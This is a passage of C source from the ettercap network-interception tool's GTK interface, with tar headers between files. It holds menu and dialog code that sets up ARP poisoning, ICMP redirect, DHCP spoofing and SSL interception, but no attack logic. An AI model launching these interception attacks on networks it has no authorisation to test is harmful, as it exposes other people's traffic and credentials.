button = gtk_button_new_with_mnemonic("_Delete Host"); gtk_box_pack_start(GTK_BOX (hbox), button, TRUE, TRUE, 0); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_button_callback), &host_delete); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("Add to Target _1"); gtk_box_pack_start(GTK_BOX (hbox), button, TRUE, TRUE, 0); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_button_callback), &host_target1); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("Add to Target _2"); gtk_box_pack_start(GTK_BOX (hbox), button, TRUE, TRUE, 0); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_button_callback), &host_target2); gtk_widget_show(button); context_menu = gtk_menu_new(); item = gtk_menu_item_new_with_label("Add to Target 1"); gtk_menu_shell_append(GTK_MENU_SHELL(context_menu), item); g_signal_connect(G_OBJECT(item), "activate", G_CALLBACK(gtkui_button_callback), &host_target1); gtk_widget_show(item); item = gtk_menu_item_new_with_label("Add to Target 2"); gtk_menu_shell_append(GTK_MENU_SHELL(context_menu), item); g_signal_connect(G_OBJECT(item), "activate", G_CALLBACK(gtkui_button_callback), &host_target2); gtk_widget_show(item); item = gtk_menu_item_new_with_label("Delete host"); gtk_menu_shell_append(GTK_MENU_SHELL(context_menu), item); g_signal_connect(G_OBJECT(item), "activate", G_CALLBACK(gtkui_button_callback), &host_delete); gtk_widget_show(item); g_signal_connect(G_OBJECT(treeview), "button-press-event", G_CALLBACK(gtkui_context_menu), context_menu); gtk_widget_show(hosts_window); } static void gtkui_hosts_detach(GtkWidget *child) { hosts_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (hosts_window), "Hosts list"); gtk_window_set_default_size(GTK_WINDOW (hosts_window), 400, 300); g_signal_connect (G_OBJECT (hosts_window), "delete_event", G_CALLBACK (gtkui_hosts_destroy), NULL); gtk_container_add(GTK_CONTAINER (hosts_window), child); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(hosts_window, gtkui_hosts_attach); gtk_window_present(GTK_WINDOW (hosts_window)); } static void gtkui_hosts_attach(void) { /* destroy the current window */ gtkui_hosts_destroy(); /* recreate the tab */ gtkui_host_list(); } void gtkui_hosts_destroy(void) { gtk_widget_destroy(hosts_window); hosts_window = NULL; } /* * populate the list */ gboolean gtkui_refresh_host_list(gpointer data) { GtkTreeIter iter; struct hosts_list *hl; char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN]; /* avoid warning */ (void)data; DEBUG_MSG("gtk_refresh_host_list"); /* The list store contains a 4th column that is NOT displayed by the treeview widget. This is used to store the pointer for each entry's structure. */ if(liststore) gtk_list_store_clear(GTK_LIST_STORE (liststore)); else liststore = gtk_list_store_new (4, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_POINTER); /* walk the hosts list */ LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) { /* enlarge the list */ gtk_list_store_append (liststore, &iter); /* fill the element */ gtk_list_store_set (liststore, &iter, 0, ip_addr_ntoa(&hl->ip, tmp), 1, mac_addr_ntoa(hl->mac, tmp2), 3, hl, -1); if (hl->hostname) { gtk_list_store_set (liststore, &iter, 2, hl->hostname, -1); } else { /* resolve the hostname (using the cache) */ if(host_iptoa(&hl->ip, name) == -E_NOMATCH) { gtk_list_store_set(liststore, &iter, 2, "resolving...", -1); struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LIST_STORE; ro->liststore = GTK_LIST_STORE(liststore); ro->treeiter = iter; ro->column = 2; ro->ip = &hl->ip; g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else gtk_list_store_set (liststore, &iter, 2, name, -1); } } /* return FALSE so that g_idle_add() only calls it once */ return FALSE; } void gtkui_button_callback(GtkWidget *widget, gpointer data) { GList *list; GtkTreeIter iter; GtkTreeModel *model; char tmp[MAX_ASCII_ADDR_LEN]; struct hosts_list *hl = NULL; gint *type = data; /* variable not used */ (void) widget; if (type == NULL) return; model = GTK_TREE_MODEL (liststore); if(gtk_tree_selection_count_selected_rows(selection) > 0) { list = gtk_tree_selection_get_selected_rows (selection, &model); for(list = g_list_last(list); list; list = g_list_previous(list)) { gtk_tree_model_get_iter(model, &iter, list->data); gtk_tree_model_get(model, &iter, 3, &hl, -1); switch(*type) { case HOST_DELETE: DEBUG_MSG("gtkui_button_callback: delete host"); gtk_list_store_remove(GTK_LIST_STORE (liststore), &iter); /* remove the host from the list */ LIST_REMOVE(hl, next); SAFE_FREE(hl->hostname); SAFE_FREE(hl); break; case HOST_TARGET1: DEBUG_MSG("gtkui_button_callback: add target1"); /* add the ip to the target */ add_ip_list(&hl->ip, EC_GBL_TARGET1); gtkui_create_targets_array(); USER_MSG("Host %s added to TARGET1\n", ip_addr_ntoa(&hl->ip, tmp)); break; case HOST_TARGET2: DEBUG_MSG("gtkui_button_callback: add target2"); /* add the ip to the target */ add_ip_list(&hl->ip, EC_GBL_TARGET2); gtkui_create_targets_array(); USER_MSG("Host %s added to TARGET2\n", ip_addr_ntoa(&hl->ip, tmp)); break; } } /* free the list of selections */ g_list_foreach (list,(GFunc) gtk_tree_path_free, NULL); g_list_free (list); } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_live.c000664 000000 000000 00000002015 13711276346 021576 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /*******************************************/ /* the interface */ void gtkui_sniff_live(void) { DEBUG_MSG("gtk_sniff_live"); gtkui_create_menu(1); /* online menus */ } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_logging.c000664 000000 000000 00000011364 13711276346 022274 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #define FILE_LEN 40 /* proto */ static void log_all(void); static void log_info(void); static void log_msg(void); /* globals */ static char *logfile; /*******************************************/ void toggle_compress(void) { if (EC_GBL_OPTIONS->compress) { EC_GBL_OPTIONS->compress = 0; } else { EC_GBL_OPTIONS->compress = 1; } } /* * display the log dialog */ void gtkui_log_all(void) { GtkWidget *dialog; gchar *filename; DEBUG_MSG("gtk_log_all"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, FILE_LEN, sizeof(char)); dialog = gtk_file_chooser_dialog_new("Save all to logfile...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_SAVE, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_SAVE, GTK_RESPONSE_OK, NULL); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), "."); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); gtk_widget_destroy(dialog); memcpy(logfile, filename, FILE_LEN); g_free(filename); log_all(); } else { gtk_widget_destroy(dialog); } } static void log_all(void) { /* a check on the input */ if (strlen(logfile) == 0) { ui_error("Please specify a filename"); return; } set_loglevel(LOG_PACKET, logfile); SAFE_FREE(logfile); } /* * display the log dialog */ void gtkui_log_info(void) { GtkWidget *dialog; gchar *filename; DEBUG_MSG("gtk_log_info"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, FILE_LEN, sizeof(char)); dialog = gtk_file_chooser_dialog_new("Save infos to logfile...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_SAVE, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_SAVE, GTK_RESPONSE_OK, NULL); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), "."); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); gtk_widget_destroy(dialog); memcpy(logfile, filename, FILE_LEN); g_free(filename); log_info(); } else { gtk_widget_destroy(dialog); } } static void log_info(void) { /* a check on the input */ if (strlen(logfile) == 0) { ui_error("Please specify a filename"); return; } set_loglevel(LOG_INFO, logfile); SAFE_FREE(logfile); } void gtkui_stop_log(void) { set_loglevel(LOG_STOP, ""); gtkui_message("Logging was stopped."); } /* * display the log dialog */ void gtkui_log_msg(void) { GtkWidget *dialog; gchar *filename; DEBUG_MSG("gtk_log_msg"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, FILE_LEN, sizeof(char)); dialog = gtk_file_chooser_dialog_new("Safe Log Messages in file...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_SAVE, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_SAVE, GTK_RESPONSE_OK, NULL); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), "."); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); gtk_widget_destroy(dialog); memcpy(logfile, filename, FILE_LEN); g_free(filename); log_msg(); } else { gtk_widget_destroy(dialog); } } static void log_msg(void) { /* a check on the input */ if (strlen(logfile) == 0) { ui_error("Please specify a filename"); return; } set_msg_loglevel(LOG_TRUE, logfile); SAFE_FREE(logfile); } void gtkui_stop_msg(void) { set_msg_loglevel(LOG_FALSE, NULL); gtkui_message("Message logging was stopped."); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_menus.c000664 000000 000000 00000044654 13711276346 022005 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /* globals */ /*******************************************/ void gtkui_create_menu(int live) { GtkAccelGroup *accel_group; GtkWidget *vbox, *main_menu; GtkActionGroup *menuactions; GtkAction *action; GError *error = NULL; GClosure *closure = NULL; gint keyval; GdkModifierType mods; const gchar *menu_structure = "" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " #ifdef WITH_IPV6 " " #endif " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " #ifdef WITH_IPV6 " " #endif " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " #ifdef HAVE_PLUGINS " " " " " " " " #endif " " #ifndef OS_WINDOWS " " #endif " " " " " " ""; GtkActionEntry start_menu_items[] = { /* Start Menu */ { "StartMenuAction", NULL, "_Start", NULL, NULL, NULL }, { "SniffStartAction", GTK_STOCK_YES, "Start sniffing", "w", NULL, G_CALLBACK(gtkui_start_sniffing) }, { "SniffStopAction", GTK_STOCK_NO, "Stop sniffing", "e", NULL, G_CALLBACK(gtkui_stop_sniffing) }, { "ExitAction", GTK_STOCK_QUIT, "E_xit", "q", NULL, G_CALLBACK(gtkui_exit) } }; GtkActionEntry targets_menu_items[] = { /* Targets Menu */ { "TargetsMenuAction", NULL, "_Targets", NULL, NULL, NULL }, { "CurrentTargetsAction", GTK_STOCK_FIND, "Current targets", "t", NULL, G_CALLBACK(gtkui_current_targets) }, { "SelectTargetsAction", GTK_STOCK_ADD, "Select target(s)", "t", NULL, G_CALLBACK(gtkui_select_targets) }, { "ProtocolAction", GTK_STOCK_JUMP_TO, "_Protocol...", "p", NULL, G_CALLBACK(gtkui_select_protocol) }, { "WipeTargetsAction", GTK_STOCK_CLEAR, "_Wipe targets", "W", NULL, G_CALLBACK(wipe_targets) } }; GtkActionEntry hosts_menu_items[] = { /* Hosts Menu */ { "HostsMenuAction", NULL, "_Hosts", NULL, NULL, NULL }, { "HostsListAction", GTK_STOCK_INDEX, "_Hosts list", "h", NULL, G_CALLBACK(gtkui_host_list) }, { "ScanHostsAction", GTK_STOCK_FIND, "_Scan for hosts", "s", NULL, G_CALLBACK(gtkui_scan) }, { "LoadHostsAction", GTK_STOCK_OPEN, "Load from file...", "", NULL, G_CALLBACK(gtkui_load_hosts) }, { "SaveHostsAction", GTK_STOCK_SAVE, "Save to file...", "", NULL, G_CALLBACK(gtkui_save_hosts) } }; GtkActionEntry view_menu_items[] = { /* View Menu */ { "ViewMenuAction", NULL, "_View", NULL, NULL, NULL }, { "ViewConnectionsAction", GTK_STOCK_JUSTIFY_FILL, "_Connections", "c", NULL, G_CALLBACK(gtkui_show_connections) }, { "ViewProfilesAction", GTK_STOCK_JUSTIFY_LEFT, "Pr_ofiles", "o", NULL, G_CALLBACK(gtkui_show_profiles) }, { "ViewStatisticsAction", GTK_STOCK_PROPERTIES, "_Statistics", NULL, NULL, G_CALLBACK(gtkui_show_stats) }, { "VisualisationMethodAction", GTK_STOCK_PREFERENCES, "_Visualisation method...", "v", NULL, G_CALLBACK(gtkui_vis_method) }, { "VisualisationRegexAction", GTK_STOCK_FIND, "Visualisation _regex...", "R", NULL, G_CALLBACK(gtkui_vis_regex) }, { "SetWifiKeyAction", GTK_STOCK_FIND, "Set the _WiFi key...", NULL, NULL, G_CALLBACK(gtkui_wifi_key) } }; GtkActionEntry mitm_menu_items[] = { /* Mitm Menu */ { "MitmMenuAction", NULL, "_Mitm", NULL, NULL, NULL }, { "ArpPoisoningAction", NULL, "ARP poisoning...", NULL, NULL, G_CALLBACK(gtkui_arp_poisoning) }, { "IcmpRedirectAction", NULL, "ICMP redirect...", NULL, NULL, G_CALLBACK(gtkui_icmp_redir) }, { "PortStealingAction", NULL, "Port stealing...", NULL, NULL, G_CALLBACK(gtkui_port_stealing) }, { "DhcpSpoofingAction", NULL, "DHCP spoofing...", NULL, NULL, G_CALLBACK(gtkui_dhcp_spoofing) }, #ifdef WITH_IPV6 { "NdpPoisoningAction", NULL, "NDP poisoning...", NULL, NULL, G_CALLBACK(gtkui_ndp_poisoning) }, #endif { "StopMitmAttacksAction", NULL, "Stop mitm attack(s)", NULL, NULL, G_CALLBACK(gtkui_mitm_stop) }, { "SSLRedirectsAction", NULL, "SSL Intercept", NULL, NULL, G_CALLBACK(gtkui_sslredir_show) } }; GtkActionEntry filters_menu_items[] = { /* Filters Menu */ { "FiltersMenuAction", NULL, "_Filters", NULL, NULL, NULL }, { "LoadFilterAction", GTK_STOCK_OPEN, "Load a filter...", "f", NULL, G_CALLBACK(gtkui_load_filter) }, { "StopFilterAction", GTK_STOCK_STOP, "Stop _filtering", "f", NULL, G_CALLBACK(gtkui_stop_filter) } }; GtkActionEntry logging_menu_items[] = { /* Logging Menu */ { "LoggingMenuAction", NULL, "_Logging", NULL, NULL, NULL }, { "LoggingAllAction", GTK_STOCK_SAVE, "Logging all packets and infos...", "i", NULL, G_CALLBACK(gtkui_log_all) }, { "LoggingInfoAction", GTK_STOCK_SAVE_AS, "Logging only infos...", "i", NULL, G_CALLBACK(gtkui_log_info) }, { "LoggingStopAction", GTK_STOCK_STOP, "Stop logging infos", NULL, NULL, G_CALLBACK(gtkui_stop_log) }, { "LogMessagesAction", GTK_STOCK_REVERT_TO_SAVED, "Log user messages...", "m", NULL, G_CALLBACK(gtkui_log_msg) }, { "LogMessagesStopAction", GTK_STOCK_STOP, "Stop logging messages", NULL, NULL, G_CALLBACK(gtkui_stop_msg) } }; #ifdef HAVE_PLUGINS GtkActionEntry plugins_menu_items[] = { /* Plugins Menu */ { "PluginsMenuAction", NULL, "_Plugins", NULL, NULL, NULL }, { "ManagePluginsAction", GTK_STOCK_EXECUTE, "Manage the plugins", "p", NULL, G_CALLBACK(gtkui_plugin_mgmt) }, { "LoadPluginAction", GTK_STOCK_OPEN, "Load a plugin...", NULL, NULL, G_CALLBACK(gtkui_plugin_load) } }; #endif GtkActionEntry help_menu_items[] = { /* Help Menu */ { "HelpMenuAction", NULL, "_Info", NULL, NULL, NULL }, #ifndef OS_WINDOWS { "HelpAction", GTK_STOCK_HELP, "Help", "F1", NULL, G_CALLBACK(gtkui_help) }, #endif { "AboutDialogAction", GTK_STOCK_ABOUT, "About", NULL, NULL, G_CALLBACK(gtkui_about) } }; GtkToggleActionEntry toggle_items[] = { { "ReverseMatchingAction", NULL, "Reverse matching", NULL, NULL, G_CALLBACK(toggle_reverse), FALSE }, #ifdef WITH_IPV6 { "EnableIPv6ScanAction", NULL, "Enable IPv6 scan", NULL, NULL, G_CALLBACK(toggle_ip6scan), FALSE }, #endif { "ResolveIpAddressesAction", NULL, "Resolve IP addresses", NULL, NULL, G_CALLBACK(toggle_resolve), FALSE }, { "LogCompressedAction", NULL, "Compressed file", NULL, NULL, G_CALLBACK(toggle_compress), FALSE } }; DEBUG_MSG("gtk_create_menu"); /* remove old menu, it will be automatically destroyed by gtk_main */ vbox = gtk_bin_get_child(GTK_BIN (window)); main_menu = gtk_ui_manager_get_widget(menu_manager, "/MenuBar"); gtk_widget_hide(main_menu); gtk_ui_manager_remove_ui(menu_manager, merge_id); menuactions = gtk_action_group_new("MenuActions"); /* Start Menu */ gtk_action_group_add_actions(menuactions, start_menu_items, G_N_ELEMENTS(start_menu_items), NULL); /* Targets Menu */ gtk_action_group_add_actions(menuactions, targets_menu_items, G_N_ELEMENTS(targets_menu_items), NULL); /* Hosts Menu */ gtk_action_group_add_actions(menuactions, hosts_menu_items, G_N_ELEMENTS(hosts_menu_items), NULL); /* View Menu */ gtk_action_group_add_actions(menuactions, view_menu_items, G_N_ELEMENTS(view_menu_items), NULL); /* MITM Menu */ gtk_action_group_add_actions(menuactions, mitm_menu_items, G_N_ELEMENTS(mitm_menu_items), NULL); /* Filters Menu */ gtk_action_group_add_actions(menuactions, filters_menu_items, G_N_ELEMENTS(filters_menu_items), NULL); /* Logging Menu */ gtk_action_group_add_actions(menuactions, logging_menu_items, G_N_ELEMENTS(logging_menu_items), NULL); #ifdef HAVE_PLUGINS /* Plugins Menu */ gtk_action_group_add_actions(menuactions, plugins_menu_items, G_N_ELEMENTS(plugins_menu_items), NULL); #endif #ifndef OS_WINDOWS /* Help Menu */ gtk_action_group_add_actions(menuactions, help_menu_items, G_N_ELEMENTS(help_menu_items), NULL); #endif gtk_action_group_add_toggle_actions(menuactions, toggle_items, G_N_ELEMENTS(toggle_items), NULL); menu_manager = gtk_ui_manager_new(); gtk_ui_manager_insert_action_group(menu_manager, menuactions, 0); merge_id = gtk_ui_manager_add_ui_from_string(menu_manager, menu_structure, -1, &error); if (error) { g_message("building menu failed: %s", error->message); g_error_free(error); error = NULL; } /* Some hidden accellerators */ accel_group = gtk_accel_group_new (); closure = g_cclosure_new(G_CALLBACK(gtkui_exit), NULL, NULL); gtk_accelerator_parse("X", &keyval, &mods); gtk_accel_group_connect(accel_group, keyval, mods, 0, closure); gtk_window_add_accel_group(GTK_WINDOW(window), accel_group); gtk_window_add_accel_group(GTK_WINDOW(window), gtk_ui_manager_get_accel_group(menu_manager)); if(EC_GBL_OPTIONS->reversed) { EC_GBL_OPTIONS->reversed = 0; action = gtk_ui_manager_get_action(menu_manager, "/MenuBar/TargetsMenu/ReverseMatching"); gtk_toggle_action_set_active(GTK_TOGGLE_ACTION(action), TRUE); } if(EC_GBL_OPTIONS->resolve) { EC_GBL_OPTIONS->resolve = 0; action = gtk_ui_manager_get_action(menu_manager, "/MenuBar/ViewMenu/ResolveIpAddresses"); gtk_toggle_action_set_active(GTK_TOGGLE_ACTION(action), TRUE); } if(EC_GBL_OPTIONS->compress) { EC_GBL_OPTIONS->compress = 0; action = gtk_ui_manager_get_action(menu_manager, "/MenuBar/LoggingMenu/LogCompressed"); gtk_toggle_action_set_active(GTK_TOGGLE_ACTION(action), TRUE); } /* Some menus doesn't apply if started in offline or bridged sniffing mode */ if (live == 0 || EC_GBL_SNIFF->type == SM_BRIDGED) { gtk_widget_set_visible(gtk_ui_manager_get_widget(menu_manager, "/MenuBar/HostsMenu"), FALSE); gtk_widget_set_visible(gtk_ui_manager_get_widget(menu_manager, "/MenuBar/MitmMenu"), FALSE); } #ifdef HAVE_PLUGINS if (live == 0) gtk_widget_set_visible(gtk_ui_manager_get_widget(menu_manager, "/MenuBar/PluginsMenu"), FALSE); #endif /* get the menu widget and add it to the window */ main_menu = gtk_ui_manager_get_widget(menu_manager, "/MenuBar"); gtk_box_pack_start(GTK_BOX(vbox), main_menu, FALSE, FALSE, 0); gtk_widget_show(main_menu); } void gtkui_create_tab_menu(void) { GtkWidget *context; GtkUIManager *tab_menu_manager; GtkActionGroup *tabactions; GError *error = NULL; static gchar *tab_menu_structure = "" " " " " " " " " " " " " " " ""; GtkActionEntry tab_menu_items[] = { { "DetachPageAction", GTK_STOCK_GO_UP, "Detach page", "D", NULL, G_CALLBACK(gtkui_page_detach_current) }, { "ClosePageAction", GTK_STOCK_CLOSE, "Close page", "W", NULL, G_CALLBACK(gtkui_page_close_current) }, { "NextPageAction", GTK_STOCK_GO_FORWARD, "Next page", "Tab", NULL, G_CALLBACK(gtkui_page_right) }, { "PreviousPageAction", GTK_STOCK_GO_BACK, "Previous page", "Tab", NULL, G_CALLBACK(gtkui_page_left) } }; /* Create Action Group for tab menu */ tabactions = gtk_action_group_new("TabActions"); gtk_action_group_add_actions(tabactions, tab_menu_items, G_N_ELEMENTS(tab_menu_items), NULL); /* context menu for notebook */ tab_menu_manager = gtk_ui_manager_new(); gtk_ui_manager_insert_action_group(tab_menu_manager, tabactions, 0); gtk_ui_manager_add_ui_from_string(tab_menu_manager, tab_menu_structure, -1, &error); if (error) { g_message("building tab menu failed: %s", error->message); g_error_free(error); error = NULL; } /* Add Accelerators */ gtk_window_add_accel_group(GTK_WINDOW(window), gtk_ui_manager_get_accel_group(tab_menu_manager)); /* Bind popup menu to event */ context = gtk_ui_manager_get_widget(tab_menu_manager, "/NoteBook"); g_signal_connect(G_OBJECT(notebook), "button-press-event", G_CALLBACK(gtkui_context_menu), context); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_mitm.c000664 000000 000000 00000040642 13711276346 021615 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* proto */ static void gtkui_start_mitm(void); /* globals */ #define PARAMS_LEN 512 static char params[PARAMS_LEN+1]; /*******************************************/ void gtkui_arp_poisoning(void) { GtkWidget *dialog, *vbox, *hbox, *image, *button1, *button2, *frame, *content_area; gint response = 0; gboolean remote = FALSE; DEBUG_MSG("gtk_arp_poisoning"); // not needed, the \0 is already appended from snprintf // memset(params, '\0', PARAMS_LEN+1); dialog = gtk_dialog_new_with_buttons("MITM Attack: ARP Poisoning", GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, FALSE); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); gtk_widget_show(hbox); image = gtk_image_new_from_stock (GTK_STOCK_DIALOG_QUESTION, GTK_ICON_SIZE_DIALOG); gtk_misc_set_alignment (GTK_MISC (image), 0.5, 0.1); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 5); gtk_widget_show(image); frame = gtk_frame_new("Optional parameters"); gtk_container_set_border_width(GTK_CONTAINER (frame), 5); gtk_box_pack_start (GTK_BOX (hbox), frame, TRUE, TRUE, 0); gtk_widget_show(frame); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 2, FALSE); gtk_container_set_border_width(GTK_CONTAINER (vbox), 5); gtk_container_add(GTK_CONTAINER (frame), vbox); gtk_widget_show(vbox); button1 = gtk_check_button_new_with_label("Sniff remote connections."); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button1), TRUE); gtk_box_pack_start(GTK_BOX (vbox), button1, FALSE, FALSE, 0); gtk_widget_show(button1); button2 = gtk_check_button_new_with_label("Only poison one-way."); gtk_box_pack_start(GTK_BOX (vbox), button2, FALSE, FALSE, 0); gtk_widget_show(button2); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); const char *s_remote = "", *comma = "", *s_oneway = ""; if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1))) { s_remote="remote"; remote = TRUE; } if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2))) { if(remote) comma = ","; s_oneway = "oneway"; } snprintf(params, PARAMS_LEN+1, "arp:%s%s%s", s_remote, comma, s_oneway); gtkui_start_mitm(); } gtk_widget_destroy(dialog); /* a simpler method: gtkui_input_call("Parameters :", params + strlen("arp:"), PARAMS_LEN - strlen("arp:"), gtkui_start_mitm); */ } void gtkui_icmp_redir(void) { GtkWidget *dialog, *table, *hbox, *image, *label, *entry1, *entry2, *frame, *content_area; gint response = 0; DEBUG_MSG("gtk_icmp_redir"); dialog = gtk_dialog_new_with_buttons("MITM Attack: ICMP Redirect", GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, FALSE); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); gtk_widget_show(hbox); image = gtk_image_new_from_stock (GTK_STOCK_DIALOG_QUESTION, GTK_ICON_SIZE_DIALOG); gtk_misc_set_alignment (GTK_MISC (image), 0.5, 0.1); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 5); gtk_widget_show(image); frame = gtk_frame_new("Gateway Information"); gtk_container_set_border_width(GTK_CONTAINER (frame), 5); gtk_box_pack_start (GTK_BOX (hbox), frame, TRUE, TRUE, 0); gtk_widget_show(frame); table = gtk_table_new(2, 2, FALSE); gtk_table_set_row_spacings(GTK_TABLE (table), 5); gtk_table_set_col_spacings(GTK_TABLE (table), 5); gtk_container_set_border_width(GTK_CONTAINER (table), 8); gtk_container_add(GTK_CONTAINER (frame), table); gtk_widget_show(table); label = gtk_label_new("MAC Address"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE (table), label, 0, 1, 0, 1, GTK_FILL, GTK_FILL, 0, 0); gtk_widget_show(label); entry1 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY (entry1), ETH_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE (table), entry1, 1, 2, 0, 1); gtk_widget_show(entry1); label = gtk_label_new("IP Address"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE (table), label, 0, 1, 1, 2, GTK_FILL, GTK_FILL, 0, 0); gtk_widget_show(label); entry2 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY (entry2), IP6_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE (table), entry2, 1, 2, 1, 2); gtk_widget_show(entry2); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); // memset(params, '\0', PARAMS_LEN); snprintf(params, PARAMS_LEN+1, "icmp:%s/%s", gtk_entry_get_text(GTK_ENTRY(entry1)), gtk_entry_get_text(GTK_ENTRY(entry2))); gtkui_start_mitm(); } gtk_widget_destroy(dialog); /* a simpler method: gtkui_input_call("Parameters :", params + strlen("icmp:"), PARAMS_LEN - strlen("icmp:"), 